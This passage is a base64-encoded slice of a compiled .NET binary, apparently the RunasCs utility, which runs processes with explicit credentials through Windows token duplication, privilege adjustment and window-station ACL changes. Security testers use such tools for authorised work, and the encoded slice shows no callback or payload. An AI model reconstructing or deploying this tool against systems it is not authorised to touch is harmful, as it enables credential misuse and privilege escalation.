EAERFU0tUT1BfSk9VUk5BTFBMQVlCQUNLAERFU0tUT1BfRU5VTUVSQVRFAERFU0tUT1BfV1JJVEVPQkpFQ1RTAERFU0tUT1BfU1dJVENIREVTS1RPUABERVNLVE9QX0FMTABXSU5TVEFfRU5VTURFU0tUT1BTAFdJTlNUQV9SRUFEQVRUUklCVVRFUwBXSU5TVEFfQUNDRVNTQ0xJUEJPQVJEAFdJTlNUQV9DUkVBVEVERVNLVE9QAFdJTlNUQV9XUklURUFUVFJJQlVURVMAV0lOU1RBX0FDQ0VTU0dMT0JBTEFUT01TAFdJTlNUQV9FWElUV0lORE9XUwBXSU5TVEFfRU5VTUVSQVRFAFdJTlNUQV9SRUFEU0NSRUVOAFdJTlNUQV9BTEwAT1dORVJfU0VDVVJJVFlfSU5GT1JNQVRJT04AR1JPVVBfU0VDVVJJVFlfSU5GT1JNQVRJT04AREFDTF9TRUNVUklUWV9JTkZPUk1BVElPTgBTQUNMX1NFQ1VSSVRZX0lORk9STUFUSU9OAFVOUFJPVEVDVEVEX1NBQ0xfU0VDVVJJVFlfSU5GT1JNQVRJT04AVU5QUk9URUNURURfREFDTF9TRUNVUklUWV9JTkZPUk1BVElPTgBQUk9URUNURURfU0FDTF9TRUNVUklUWV9JTkZPUk1BVElPTgBQUk9URUNURURfREFDTF9TRUNVUklUWV9JTkZPUk1BVElPTgBBY2xSZXZpc2lvbkluZm9ybWF0aW9uAEFjbFNpemVJbmZvcm1hdGlvbgBTaWRUeXBlVXNlcgBTaWRUeXBlR3JvdXAAU2lkVHlwZURvbWFpbgBTaWRUeXBlQWxpYXMAU2lkVHlwZVdlbGxLbm93bkdyb3VwAFNpZFR5cGVEZWxldGVkQWNjb3VudABTaWRUeXBlSW52YWxpZABTaWRUeXBlVW5rbm93bgBTaWRUeXBlQ29tcHV0ZXIAVmFsdWUAQWNlQ291bnQAQWNsQnl0ZXNJblVzZQBBY2xCeXRlc0ZyZWUAQWNlVHlwZQBBY2VGbGFncwBBY2VTaXplAEhlYWRlcgBNYXNrAFNpZFN0YXJ0AEdldFRva2VuSW5mb3JtYXRpb24ATG9va3VwUHJpdmlsZWdlTmFtZQBjb252ZXJ0QXR0cmlidXRlVG9TdHJpbmcAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATGlzdGAxAGdldFRva2VuUHJpdmlsZWdlcwBUb2tlblVzZXIAVG9rZW5Hcm91cHMAVG9rZW5Qcml2aWxlZ2VzAFRva2VuT3duZXIAVG9rZW5QcmltYXJ5R3JvdXAAVG9rZW5EZWZhdWx0RGFjbABUb2tlblNvdXJjZQBUb2tlbkltcGVyc29uYXRpb25MZXZlbABUb2tlblN0YXRpc3RpY3MAVG9rZW5SZXN0cmljdGVkU2lkcwBUb2tlblNlc3Npb25JZABUb2tlbkdyb3Vwc0FuZFByaXZpbGVnZXMAVG9rZW5TZXNzaW9uUmVmZXJlbmNlAFRva2VuU2FuZEJveEluZXJ0AFRva2VuQXVkaXRQb2xpY3kAVG9rZW5PcmlnaW4AUHJpdmlsZWdlcwBoZWxwAEhlbHBSZXF1aXJlZABDaGVja0FyZ3MARGlzcGxheUhlbHAAUGFyc2VEb21haW4AUGFyc2VQcm9jZXNzVGltZW91dABQYXJzZUxvZ29uVHlwZQBQYXJzZUNyZWF0ZVByb2Nlc3NGdW5jdGlvbgBSdW5hc0NzTWFpbgBNYWluAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBSdW5hc0NzX25ldDJfeDY0AFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBEbGxJbXBvcnRBdHRyaWJ1dGUAS2VybmVsMzIuZGxsAGhhbmRsZQBtaWxsaXNlY29uZHMAYWR2YXBpMzIuZGxsAHRva2VuaGFuZGxlAGRpc2FibGVwcml2cwBOZXdzdGF0ZQBNYXJzaGFsQXNBdHRyaWJ1dGUAVW5tYW5hZ2VkVHlwZQBidWZmZXJsZW5ndGgAUHJlaXZvdXNTdGF0ZQBSZXR1cm5sZW5ndGgAbHBzeXN0ZW1uYW1lAGxwbmFtZQBscEx1aWQAcHN6VXNlck5hbWUAcHN6RG9tYWluAHBzelBhc3N3b3JkAGR3TG9nb25UeXBlAGR3TG9nb25Qcm92aWRlcgBwaFRva2VuAEV4aXN0aW5nVG9rZW5IYW5kbGUAZHdEZXNpcmVkQWNjZXNzAGxwVGhyZWFkQXR0cmlidXRlcwBJbXBlcnNvbmF0aW9uTGV2ZWwARHVwbGljYXRlVG9rZW5IYW5kbGUAdXNlck5hbWUAZG9tYWluAHBhc3N3b3JkAGxvZ29uRmxhZ3MAYXBwbGljYXRpb25OYW1lAGNvbW1hbmRMaW5lAGNyZWF0aW9uRmxhZ3MAZW52aXJvbm1lbnQAY3VycmVudERpcmVjdG9yeQBzdGFydHVwSW5mbwBwcm9jZXNzSW5mb3JtYXRpb24AT3V0QXR0cmlidXRlAGhUb2tlbgBscEFwcGxpY2F0aW9uTmFtZQBscENvbW1hbmRMaW5lAGxwUHJvY2Vzc0F0dHJpYnV0ZXMAYkluaGVyaXRIYW5kbGVzAGR3Q3JlYXRpb25GbGFncwBscEVudmlyb25tZW50AGxwQ3VycmVudERpcmVjdG9yeQBscFN0YXJ0dXBJbmZvAGxwUHJvY2Vzc0luZm9ybWF0aW9uAGFkdmFwaTMyAGR3TG9nb25GbGFncwBJbkF0dHJpYnV0ZQBrZXJuZWwzMi5kbGwAaFJlYWRQaXBlAGhXcml0ZVBpcGUAbHBQaXBlQXR0cmlidXRlcwBuU2l6ZQBoRmlsZQBscEJ1ZmZlcgBuTnVtYmVyT2ZCeXRlc1RvUmVhZABscE51bWJlck9mQnl0ZXNSZWFkAGxwT3ZlcmxhcHBlZABoU291cmNlUHJvY2Vzc0hhbmRsZQBoU291cmNlSGFuZGxlAGhUYXJnZXRQcm9jZXNzSGFuZGxlAGxwVGFyZ2V0SGFuZGxlAGR3T3B0aW9ucwBjcmVhdGVQcm9jZXNzRnVuY3Rpb24AcHJpdmlsZWdlAHRva2VuAE1hcnNoYWwAR2V0TGFzdFdpbjMyRXJyb3IASW50MzIAU3RyaW5nAENvbmNhdABTaXplT2YASW50UHRyAFplcm8AQnl0ZQBFbmNvZGluZwBnZXRfRGVmYXVsdABHZXRTdHJpbmcAdXNlcm5hbWUAY21kAGRvbWFpbk5hbWUAcHJvY2Vzc1RpbWVvdXQAbG9nb25UeXBlAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAGdldF9IYW5kbGUAZ2V0X1Nlc3Npb25JZABFbnZpcm9ubWVudABHZXRFbnZpcm9ubWVudFZhcmlhYmxlAG9wX0V4cGxpY2l0AFRvU3RyaW5nAFN0cnVjdExheW91dEF0dHJpYnV0ZQBMYXlvdXRLaW5kAHVzZXIzMgB1c2VyMzIuZGxsAGhPYmoAbkluZGV4AHB2SW5mbwBuTGVuZ3RoAGxwbkxlbmd0aE5lZWRlZABscHN6V2luU3RhAGZJbmhlcml0AGxwc3pEZXNrdG9wAGhXaW5TdGEAcFNpZABwU0lSZXF1ZXN0ZWQAcFNJRABwU2VjdXJpdHlEZXNjcmlwdG9yAGJEYWNsUHJlc2VudABwRGFjbABiRGFjbERlZmF1bHRlZABwQWNsAHBBY2xJbmZvcm1hdGlvbgBuQWNsSW5mb3JtYXRpb25MZW5ndGgAZHdBY2xJbmZvcm1hdGlvbkNsYXNzAFNlY3VyaXR5RGVzY3JpcHRvcgBkd1JldmlzaW9uAG5BY2xMZW5ndGgAZHdBY2xSZXZpc2lvbgBhY2xQdHIAYWNlSW5kZXgAYWNlUHRyAGR3QWNlUmV2aXNpb24AZHdTdGFydGluZ0FjZUluZGV4AHBBY2VMaXN0AG5BY2VMaXN0TGVuZ3RoAEFjY2Vzc01hc2sAc2QAZGFjbFByZXNlbnQAZGFjbABkYWNsRGVmYXVsdGVkAHBTRABuRGVzdGluYXRpb25TaWRMZW5ndGgAcERlc3RpbmF0aW9uU2lkAHBTb3VyY2VTaWQAbHBTeXN0ZW1OYW1lAGxwQWNjb3VudE5hbWUAU2lkAGNiU2lkAFJlZmVyZW5jZWREb21haW5OYW1lAGNjaFJlZmVyZW5jZWREb21haW5OYW1lAHBlVXNlAGdldF9DYXBhY2l0eQBvcF9JbmVxdWFsaXR5AEVuc3VyZUNhcGFjaXR5AENvbnNvbGUAU3lzdGVtLklPAFRleHRXcml0ZXIAZ2V0X091dABXcml0ZQBBbGxvY0hHbG9iYWwAQ29weQBtYXNrAGFjZUZsYWdzAGFjZVNpemUAVHlwZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBVSW50MzIAU3RydWN0dXJlVG9QdHIAVG9JbnQ2NABGcmVlSEdsb2JhbABvcF9FcXVhbGl0eQBQdHJUb1N0cnVjdHVyZQBTdWJzdHJpbmcAZXhpdABFeGl0AEZsYWdzQXR0cmlidXRlAFRva2VuSGFuZGxlAFRva2VuSW5mb3JtYXRpb25DbGFzcwBUb2tlbkluZm9ybWF0aW9uAFRva2VuSW5mb3JtYXRpb25MZW5ndGgAUmV0dXJuTGVuZ3RoAGxwTmFtZQBjY2hOYW1lAGF0dHJpYnV0ZQB0SGFuZGxlAEFkZABwYXJhbQBhcmd1bWVudHMAQ29udmVydABUb1VJbnQzMgBUb0ludDMyAFN5c3RlbS5TZWN1cml0eS5QcmluY2lwYWwAV2luZG93c0lkZW50aXR5AEdldEN1cnJlbnQAZ2V0X1Rva2VuAEVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgBnZXRfQ3VycmVudABNb3ZlTmV4dABJRGlzcG9zYWJsZQBEaXNwb3NlAGFyZ3MALmNjdG9yAAAAK0MAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAQQBzAFUAcwBlAHIAKAApAAAzQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwBXAGkAdABoAFQAbwBrAGUAbgBXACgAKQAAM0MAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAVwBpAHQAaABMAG8AZwBvAG4AVwAoACkAAAEAd3sAewB7AFIAdQBuAGEAcwBDAHMARQB4AGMAZQBwAHQAaQBvAG4AfQB9AH0ADQAKAEEAZABqAHUAcwB0AFQAbwBrAGUAbgBQAHIAaQB2AGkAbABlAGcAZQBzACAAbwBuACAAcAByAGkAdgBpAGwAZQBnAGUAIAAAMyAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQA6ACAAAEsNAAoAQQBkAGoAdQBzAHQAVABvAGsAZQBuAFAAcgBpAHYAaQBsAGUAZwBlAHMAIABvAG4AIABwAHIAaQB2AGkAbABlAGcAZQAgAAAVIABzAHUAYwBjAGUAZQBkAGUAZAAAO1MAZQBBAHMAcwBpAGcAbgBQAHIAaQBtAGEAcgB5AFQAbwBrAGUAbgBQAHIAaQB2AGkAbABlAGcAZQAAIVMAZQBBAHUAZABpAHQAUAByAGkAdgBpAGwAZQBnAGUAACNTAGUAQgBhAGMAawB1AHAAUAByAGkAdgBpAGwAZQBnAGUAAC9TAGUAQwBoAGEAbgBnAGUATgBvAHQAaQBmAHkAUAByAGkAdgBpAGwAZQBnAGUAAC9TAGUAQwByAGUAYQB0AGUARwBsAG8AYgBhAGwAUAByAGkAdgBpAGwAZQBnAGUAADNTAGUAQwByAGUAYQB0AGUAUABhAGcAZQBmAGkAbABlAFAAcgBpAHYAaQBsAGUAZwBlAAA1UwBlAEMAcgBlAGEAdABlAFAAZQByAG0AYQBuAGUAbgB0AFAAcgBpAHYAaQBsAGUAZwBlAAA7UwBlAEMAcgBlAGEAdABlAFMAeQBtAGIAbwBsAGkAYwBMAGkAbgBrAFAAcgBpAHYAaQBsAGUAZwBlAAAtUwBlAEMAcgBlAGEAdABlAFQAbwBrAGUAbgBQAHIAaQB2AGkAbABlAGcAZQAAIVMAZQBEAGUAYgB1AGcAUAByAGkAdgBpAGwAZQBnAGUAAFNTAGUARABlAGwAZQBnAGEAdABlAFMAZQBzAHMAaQBvAG4AVQBzAGUAcgBJAG0AcABlAHIAcwBvAG4AYQB0AGUAUAByAGkAdgBpAGwAZQBnAGUAADdTAGUARQBuAGEAYgBsAGUARABlAGwAZQBnAGEAdABpAG8AbgBQAHIAaQB2AGkAbABlAGcAZQAALVMAZQBJAG0AcABlAHIAcwBvAG4AYQB0AGUAUAByAGkAdgBpAGwAZQBnAGUAAD9TAGUASQBuAGMAcgBlAGEAcwBlAEIAYQBzAGUAUAByAGkAbwByAGkAdAB5AFAAcgBpAHYAaQBsAGUAZwBlAAAxUwBlAEkAbgBjAHIAZQBhAHMAZQBRAHUAbwB0AGEAUAByAGkAdgBpAGwAZQBnAGUAADtTAGUASQBuAGMAcgBlAGEAcwBlAFcAbwByAGsAaQBuAGcAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUAACtTAGUATABvAGEAZABEAHIAaQB2AGUAcgBQAHIAaQB2AGkAbABlAGcAZQAAK1MAZQBMAG8AYwBrAE0AZQBtAG8AcgB5AFAAcgBpAHYAaQBsAGUAZwBlAAAzUwBlAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABQAHIAaQB2AGkAbABlAGcAZQAAL1MAZQBNAGEAbgBhAGcAZQBWAG8AbAB1AG0AZQBQAHIAaQB2AGkAbABlAGcAZQAAP1MAZQBQAHIAbwBmAGkAbABlAFMAaQBuAGcAbABlAFAAcgBvAGMAZQBzAHMAUAByAGkAdgBpAGwAZQBnAGUAACVTAGUAUgBlAGwAYQBiAGUAbABQAHIAaQB2AGkAbABlAGcAZQAAM1MAZQBSAGUAbQBvAHQAZQBTAGgAdQB0AGQAbwB3AG4AUAByAGkAdgBpAGwAZQBnAGUAACVTAGUAUgBlAHMAdABvAHIAZQBQAHIAaQB2AGkAbABlAGcAZQAAJ1MAZQBTAGUAYwB1AHIAaQB0AHkAUAByAGkAdgBpAGwAZQBnAGUAACdTAGUAUwBoAHUAdABkAG8AdwBuAFAAcgBpAHYAaQBsAGUAZwBlAAApUwBlAFMAeQBuAGMAQQBnAGUAbgB0AFAAcgBpAHYAaQBsAGUAZwBlAAA5UwBlAFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABQAHIAaQB2AGkAbABlAGcAZQAAMVMAZQBTAHkAcwB0AGUAbQBQAHIAbwBmAGkAbABlAFAAcgBpAHYAaQBsAGUAZwBlAAArUwBlAFMAeQBzAHQAZQBtAHQAaQBtAGUAUAByAGkAdgBpAGwAZQBnAGUAADFTAGUAVABhAGsAZQBPAHcAbgBlAHIAcwBoAGkAcABQAHIAaQB2AGkAbABlAGcAZQAAHVMAZQBUAGMAYgBQAHIAaQB2AGkAbABlAGcAZQAAJ1MAZQBUAGkAbQBlAFoAbwBuAGUAUAByAGkAdgBpAGwAZQBnAGUAAD9TAGUAVAByAHUAcwB0AGUAZABDAHIAZQBkAE0AYQBuAEEAYwBjAGUAcwBzAFAAcgBpAHYAaQBsAGUAZwBlAAAjUwBlAFUAbgBkAG8AYwBrAFAAcgBpAHYAaQBsAGUAZwBlAAA3UwBlAFUAbgBzAG8AbABpAGMAaQB0AGUAZABJAG4AcAB1AHQAUAByAGkAdgBpAGwAZQBnAGUAAFENAAoATgBvACAAbwB1AHQAcAB1AHQAIAByAGUAYwBlAGkAdgBlAGQAIABmAHIAbwBtACAAdABoAGUAIABwAHIAbwBjAGUAcwBzAC4ADQAKAAB3ewB7AHsAUgB1AG4AYQBzAEMAcwBFAHgAYwBlAHAAdABpAG8AbgB9AH0AfQANAAoAQwByAGUAYQB0AGUAUABpAHAAZQAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAOgAgAACApXsAewB7AFIAdQBuAGEAcwBDAHMARQB4AGMAZQBwAHQAaQBvAG4AfQB9AH0ADQAKAEQAdQBwAGwAaQBjAGEAdABlAEgAYQBuAGQAbABlACAAcwB0AGQAZQByAHIAIAB3AHIAaQB0AGUAIABwAGkAcABlACAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQA6ACAAAICjewB7AHsAUgB1AG4AYQBzAEMAcwBFAHgAYwBlAHAAdABpAG8AbgB9AH0AfQANAAoARAB1AHAAbABpAGMAYQB0AGUASABhAG4AZABsAGUAIABzAHQAZABvAHUAdAAgAHIAZQBhAGQAIABwAGkAcABlACAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQA6ACAAAA9DAG8AbQBTAHAAZQBjAAAHLwBjACAAAHl7AHsAewBSAHUAbgBhAHMAQwBzAEUAeABjAGUAcAB0AGkAbwBuAH0AfQB9AA0ACgBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzAFcAaQB0AGgATABvAGcAbwBuAFcAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIAAAgJt7AHsAewBSAHUAbgBhAHMAQwBzAEUAeABjAGUAcAB0AGkAbwBuAH0AfQB9AA0ACgBXAHIAbwBuAGcAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMALgAgAEwAbwBnAG8AbgBVAHMAZQByACAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQA6ACAAAICDewB7AHsAUgB1AG4AYQBzAEMAcwBFAHgAYwBlAHAAdABpAG8AbgB9AH0AfQANAAoARAB1AHAAbABpAGMAYQB0AGUAVABvAGsAZQBuAEUAeAAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAOgAgAACAi3sAewB7AFIAdQBuAGEAcwBDAHMARQB4AGMAZQBwAHQAaQBvAG4AfQB9AH0ADQAKAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAQQBzAFUAcwBlAHIAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAOgAgAACAkXsAewB7AFIAdQBuAGEAcwBDAHMARQB4AGMAZQBwAHQAaQBvAG4AfQB9AH0ADQAKAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAVwBpAHQAaABUAG8AawBlAG4AVwAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAOgAgAAArDQAKAFIAdQBuAG4AaQBuAGcAIABpAG4AIABzAGUAcwBzAGkAbwBuACAAAC8gAHcAaQB0AGgAIABwAHIAbwBjAGUAcwBzACAAZgB1AG4AYwB0AGkAbwBuACAAAAUNAAoAADMNAAoAVQBzAGkAbgBnACAAUwB0AGEAdABpAG8AbgBcAEQAZQBzAGsAdABvAHAAOgAgAAAjDQAKAEEAcwB5AG4AYwAgAHAAcgBvAGMAZQBzAHMAIAAnAAEXJwAgAHcAaQB0AGgAIABwAGkAZAAgAAFFIABjAHIAZQBhAHQAZQBkACAAYQBuAGQAIABsAGUAZgB0ACAAaQBuACAAYgBhAGMAawBnAHIAbwB1AG4AZAAuAA0ACgAAA1wAAB8NAAoAVABoAGUAIAB1AHMAZQByAG4AYQBtAGUAIAAALSAAaABhAHMAIABuAG8AdAAgAGIAZQBlAG4AIABmAG8AdQBuAGQALgANAAoAAFcNAAoATABvAG8AawB1AHAAQQBjAGMAbwB1AG4AdABOAGEAbQBlACAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQAgAABDDQAKAEMAbwBwAHkAUwBpAGQAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAEENAAoAQQBkAGQAQQBjAGUAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAG0NAAoARwBlAHQAVQBzAGUAcgBPAGIAagBlAGMAdABTAGUAYwB1AHIAaQB0AHkAIAAxACAAcwBpAHoAZQAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAIAAAYw0ACgBHAGUAdABVAHMAZQByAE8AYgBqAGUAYwB0AFMAZQBjAHUAcgBpAHQAeQAgADIAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAGcNAAoARwBlAHQAUwBlAGMAdQByAGkAdAB5AEQAZQBzAGMAcgBpAHAAdABvAHIARABhAGMAbAAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAIAAAVw0ACgBHAGUAdABBAGMAbABJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAG0NAAoASQBuAGkAdABpAGEAbABpAHoAZQBTAGUAYwB1AHIAaQB0AHkARABlAHMAYwByAGkAcAB0AG8AcgAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAIAAATw0ACgBJAG4AaQB0AGkAYQBsAGkAegBlAEEAYwBsACAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQAgAABBDQAKAEcAZQB0AEEAYwBlACAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQAgAABnDQAKAFMAZQB0AFMAZQBjAHUAcgBpAHQAeQBEAGUAcwBjAHIAaQBwAHQAbwByAEQAYQBjAGwAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAF8NAAoAUwBlAHQAVQBzAGUAcgBPAGIAagBlAGMAdABTAGUAYwB1AHIAaQB0AHkAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAFsNAAoAQQBkAGQAQQBjAGMAZQBzAHMAQQBsAGwAbwB3AGUAZABBAGMAZQAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAIAAAYw0ACgBHAGUAdABQAHIAbwBjAGUAcwBzAFcAaQBuAGQAbwB3AFMAdABhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAGUNAAoARwBlAHQAVQBzAGUAcgBPAGIAagBlAGMAdABJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAFcNAAoATwBwAGUAbgBXAGkAbgBkAG8AdwBTAHQAYQB0AGkAbwBuACAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQAgAABzDQAKAFMAZQB0AFAAcgBvAGMAZQBzAHMAVwBpAG4AZABvAHcAUwB0AGEAdABpAG8AbgAgAGgAVwBpAG4AcwB0AGEAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAAA9EAGUAZgBhAHUAbAB0AAB7DQAKAFMAZQB0AFAAcgBvAGMAZQBzAHMAVwBpAG4AZABvAHcAUwB0AGEAdABpAG8AbgAgAGgAVwBpAG4AcwB0AGEAUwBhAHYAZQAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAIAAASw0ACgBPAHAAZQBuAEQAZQBzAGsAdABvAHAAIABmAGEAaQBsAGUAZAAgAHcAaQB0AGgAIABlAHIAcgBvAHIAIABjAG8AZABlACAAABFcAEQAZQBmAGEAdQBsAHQAABFEAGkAcwBhAGIAbABlAGQAAB9FAG4AYQBiAGwAZQBkACAARABlAGYAYQB1AGwAdAAAD0UAbgBhAGIAbABlAGQAAC9FAG4AYQBiAGwAZQBkAHwARQBuAGEAYgBsAGUAZAAgAEQAZQBmAGEAdQBsAHQAAAtFAHIAcgBvAHIAAFsNAAoARwBlAHQAVABvAGsAZQBuAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAGYAYQBpAGwAZQBkACAAdwBpAHQAaAAgAGUAcgByAG8AcgAgAGMAbwBkAGUAIAAAWw0ACgBMAG8AbwBrAHUAcABQAHIAaQB2AGkAbABlAGcAZQBOAGEAbQBlACAAZgBhAGkAbABlAGQAIAB3AGkAdABoACAAZQByAHIAbwByACAAYwBvAGQAZQAgAAAFLQBoAAENLQAtAGgAZQBsAHAAAQUvAD8AAICtUgB1AG4AYQBzAEMAcwA6ACAATgBvAHQAIABlAG4AbwB1AGcAaAAgAGEAcgBnAHUAbQBlAG4AdABzAC4AIAAzACAAQQByAGcAdQBtAGUAbgB0AHMAIAByAGUAcQB1AGkAcgBlAGQALgAgAFUAcwBlACAALQAtAGgAZQBsAHAAIABmAG8AcgAgAGEAZABkAGkAdABpAG8AbgBhAGwAIABoAGUAbABwAC4ADQAKAAFRUgB1AG4AYQBzAEMAcwA6ACAASQBuAHYAYQBsAGkAZAAgAHAAcgBvAGMAZQBzAHMAXwB0AGkAbQBlAG8AdQB0ACAAdgBhAGwAdQBlADoAIAAAR1IAdQBuAGEAcwBDAHMAOgAgAEkAbgB2AGEAbABpAGQAIABsAG8AZwBvAG4AXwB0AHkAcABlACAAdgBhAGwAdQBlADoAIAAAmYkNAAoADQAKAFIAdQBuAGEAcwBDAHMAIAB2ADEALgAyACAALQAgAEAAcwBwAGwAaQBuAHQAZQByAF8AYwBvAGQAZQANAAoADQAKAFIAdQBuAGEAcwBDAHMAIABpAHMAIABhAG4AIAB1AHQAaQBsAGkAdAB5ACAAdABvACAAcgB1AG4AIABzAHAAZQBjAGkAZgBpAGMAIABwAHIAbwBjAGUAcwBzAGUAcwAgAHcAaQB0AGgAIABkAGkAZgBmAGUAcgBlAG4AdAAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAgAHQAaABhAG4AIAB0AGgAZQAgAHUAcwBlAHIAJwBzACAAYwB1AHIAcgBlAG4AdAAgAGwAbwBnAG8AbgAgAHAAcgBvAHYAaQBkAGUAcwANAAoAdQBzAGkAbgBnACAAZQB4AHAAbABpAGMAaQB0ACAAYwByAGUAZABlAG4AdABpAGEAbABzAC4ADQAKAFIAdQBuAGEAcwBDAHMAIABoAGEAcwAgAGEAbgAgAGEAdQB0AG8AbQBhAHQAaQBjACAAZABlAHQAZQBjAHQAaQBvAG4AIAB0AG8AIABkAGUAdABlAHIAbQBpAG4AZQAgAHQAaABlACAAYgBlAHMAdAAgAGMAcgBlAGEAdABlACAAcAByAG8AYwBlAHMAcwAgAGYAdQBuAGMAdABpAG8AbgAgAGYAbwByACAAZQB2AGUAcgB5ACAAYwBvAG4AdABlAHgAdABzAC4ADQAKAEIAYQBzAGUAZAAgAG8AbgAgAHQAaABlACAAYwBhAGwAbABlAHIAIAB0AG8AawBlAG4AIABwAGUAcgBtAGkAcwBzAGkAbwBuAHMALAAgAGkAdAAgAHcAaQBsAGwAIAB1AHMAZQAgAG8AbgBlACAAbwBmACAAdABoAGUAIABjAHIAZQBhAHQAZQAgAHAAcgBvAGMAZQBzAHMAIABmAHUAbgBjAHQAaQBvAG4AIABpAG4AIAB0AGgAZQAgAGYAbwBsAGwAbwB3AGkAbgBnACAAcAByAGUAZgBlAHIAcgBlAGQAIABvAHIAZABlAHIAOgANAAoAIAAgACAAIAAxAC4AIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzAEEAcwBVAHMAZQByACgAKQA7AA0ACgAgACAAIAAgADIALgAgAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAVwBpAHQAaABUAG8AawBlAG4AVwAoACkAOwANAAoAIAAgACAAIAAzAC4AIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzAFcAaQB0AGgATABvAGcAbwBuAFcAKAApAC4ADQAKAFQAaABlACAAdAB3AG8AIABwAHIAbwBjAGUAcwBzAGUAcwAgACgAYwBhAGwAbABpAG4AZwAgAGEAbgBkACAAYwBhAGwAbABlAGQAKQAgAHcAaQBsAGwAIABjAG8AbQBtAHUAbgBpAGMAYQB0AGUAIAB0AGgAcgBvAHUAZwBoACAAMQAgAHAAaQBwAGUAIAAoAGIAbwB0AGgAIABmAG8AcgAgAHMAdABkAG8AdQB0ACAAYQBuAGQAIABzAHQAZABlAHIAcgApAC4ADQAKAFQAaABlACAAZABlAGYAYQB1AGwAdAAgAGwAbwBnAG8AbgAgAHQAeQBwAGUAIABpAHMAIAAzACAAKABOAGUAdAB3AG8AcgBrAF8ATABvAGcAbwBuACkALgANAAoASQBmACAAeQBvAHUAIABzAGUAdAAgAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgACgAMgApACAAbABvAGcAbwBuACAAdAB5AHAAZQAgAHkAbwB1ACAAdwBpAGwAbAAgAGYAYQBjAGUAIABzAG8AbQBlACAAVQBBAEMAIAByAGUAcwB0AHIAaQBjAHQAaQBvAG4AIABwAHIAbwBiAGwAZQBtAHMALgANAAoAWQBvAHUAIABjAGEAbgAgAG0AYQBrAGUAIABpAG4AdABlAHIAYQBjAHQAaQB2AGUAIABsAG8AZwBvAG4AIAB3AGkAdABoAG8AdQB0ACAAYQBuAHkAIAByAGUAcwB0AHIAaQBjAHQAaQBvAG4AcwAgAGIAeQAgAHMAZQB0AHQAaQBuAGcAIAB0AGgAZQA